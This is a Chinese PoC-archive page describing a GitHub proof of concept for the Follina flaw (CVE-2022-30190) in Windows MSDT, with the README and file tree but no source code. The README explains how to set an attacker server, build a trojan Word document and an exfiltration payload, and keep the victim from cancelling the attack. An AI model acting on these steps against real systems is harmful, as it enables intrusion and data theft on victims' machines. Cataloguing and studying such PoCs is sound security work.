POC详情: a4168f888c9658b962857b47f94e35079c709d52

来源
https://github.com/winstxnhdw/CVE-2022-30190
关联漏洞
标题: Microsoft Windows Support Diagnostic Tool 操作系统命令注入漏洞 (CVE-2022-30190)
描述:Microsoft Windows Support Diagnostic Tool是美国微软(Microsoft)公司的收集信息以发送给 Microsoft 支持的工具。 Microsoft Windows Support Diagnostic Tool (MSDT)存在操作系统命令注入漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows
描述
A proof of concept for CVE-2022-30190 (Follina).
介绍
# CVE-2022-30190 (Follina)

[![build.yml](https://github.com/winstxnhdw/CVE-2022-30190/actions/workflows/main.yml/badge.svg)](https://github.com/winstxnhdw/CVE-2022-30190/actions/workflows/main.yml)
[![dependabot.yml](https://github.com/winstxnhdw/CVE-2022-30190/actions/workflows/dependabot.yml/badge.svg)](https://github.com/winstxnhdw/CVE-2022-30190/actions/workflows/dependabot.yml)

A proof of concept (PoC) for CVE-2022-30190 (Follina).

## Requirements

### Victim

- Windows 10 21H1 (equivalent/earlier)
- Security update KB5016616 uninstalled

### Attacker

- [Microsoft .NET SDK](https://dotnet.microsoft.com/en-us/download)
- Python 3.9 or later

## Configuration

Edit `config.xml` to modify the attacker's server hostname and port number.

```xml
<host>
  <name>{ hostname }</name>
  <port>{ port }</port>
</host>
```

## Usage

### Trojan

The following Python script will build the `trojan.docx` file and initialise the attacker's server.

```bash
python init.py
```

### Payload

Build the payload and remove all unnecessary binaries with the following.

```bash
dotnet publish LocalEXF
```

### Clean

Run the following batch script to permanently delete this directory and everything in it.

```ps1
.\destroy_all.bat
```

## Important Notes

- To execute complex PowerShell commands, like this PoC, these commands **must** be Base64 encoded.

- [index.html](build/index.html) must contain at least 4096 bytes of data within the `<script>` tag.

- All arguments must be used as described within [href.txt](build/href.txt).

- Microsoft Word cannot use the [index.html](build/index.html) file to execute JavaScript. But for whatever reason, `location.href` works.

- For commands that invoke long running tasks, a troubleshooter will appear when the victim loads the document. The victim can inadvertently deny the attack by cancelling the troubleshooter. Ensure that the command runtime is short.
文件快照

 [4.0K]  /data/pocs/a4168f888c9658b962857b47f94e35079c709d52
├── [4.0K]  build
│   ├── [4.0K]  docx
│   │   ├── [1.3K]  [Content_Types].xml
│   │   ├── [4.0K]  docProps
│   │   │   ├── [ 789]  app.xml
│   │   │   └── [ 792]  core.xml
│   │   ├── [4.0K]  _rels
│   │   └── [4.0K]  word
│   │       ├── [4.0K]  document.xml
│   │       ├── [1.8K]  fontTable.xml
│   │       ├── [4.0K]  _rels
│   │       │   └── [1013]  document.xml.rels
│   │       ├── [3.3K]  settings.xml
│   │       ├── [ 33K]  styles.xml
│   │       ├── [4.0K]  theme
│   │       │   └── [ 14K]  theme1.xml
│   │       └── [ 906]  webSettings.xml
│   ├── [ 365]  href.txt
│   └── [7.3K]  index.html
├── [  59]  config.xml
├── [ 239]  destroy_all.bat
├── [2.4K]  init.py
├── [4.0K]  LocalEXF
│   ├── [ 874]  LocalEXF.csproj
│   ├── [ 636]  omnisharp.json
│   └── [4.0K]  Scripts
│       ├── [4.0K]  Helpers
│       │   ├── [ 539]  GetFileEnumerator.cs
│       │   └── [ 600]  XMLHelper.cs
│       ├── [4.0K]  IO
│       │   ├── [ 490]  FileSystem.cs
│       │   └── [ 410]  Resources.cs
│       ├── [4.0K]  Main.cs
│       ├── [4.0K]  Network
│       │   ├── [ 601]  Host.cs
│       │   └── [1.1K]  Request.cs
│       └── [4.0K]  Utils
│           └── [ 185]  Utils.cs
├── [1.9K]  README.md
└── [4.0K]  server
    └── [ 928]  __init__.py

14 directories, 27 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。